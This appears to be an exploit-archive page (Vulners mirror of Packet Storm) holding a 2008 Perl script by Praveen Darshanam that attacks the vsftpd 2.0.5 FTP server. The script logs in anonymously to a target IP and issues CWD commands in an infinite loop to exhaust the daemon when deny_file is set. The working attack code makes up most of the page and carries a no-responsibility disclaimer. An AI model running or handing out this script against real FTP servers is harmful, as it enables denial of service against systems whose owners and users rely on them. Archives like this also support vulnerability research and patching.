Lucene search
K

vsftpd-dos.txt

🗓️ 16 Jun 2008 00:00:00Reported by Praveen DarshanamType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

vsftpd 2.0.5 FTP Server DoS vulnerabilit

Code
`#!/usr/bin/perl -w  
  
  
#######################################################################################  
# vsftpd 2.0.5 FTP Server on Red Hat Enterprise Linux (RHEL) 5, Fedora 6 to 8,  
# Foresight Linux, rPath Linux is prone to Denial-of-Service(DoS) vulnerability.  
#  
# Can be xploited by large number of CWD commands to vsftp daemon with deny_file configuration  
# option in /etc/vsftpd/vsftpd.conf or the path where FTP server is installed.  
#  
# I tried to modify local exploit found at securityfocus such that we can remotely exloit  
#  
# Author shall not bear any responsibility  
# Author: Praveen Darshanam  
# Email: praveen[underscore]recker[at]sify.com  
# Date: 07th June, 2008  
#  
#  
########################################################################################  
  
  
use Net::FTP;  
$ftp=Net::FTP->new("$ARGV[0]",Debug=>0) || die "Cannot connect to Host $ARGV[0]\n Usage: $perl script_name.pl target_ip\n";  
$ftp -> login("anonymous","anonymous") || die "Could not Login...Retry";  
  
while(1)  
{  
#this loop runs infinitely  
  
$ftp -> cwd();  
}  
  
$ftp->quit;  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation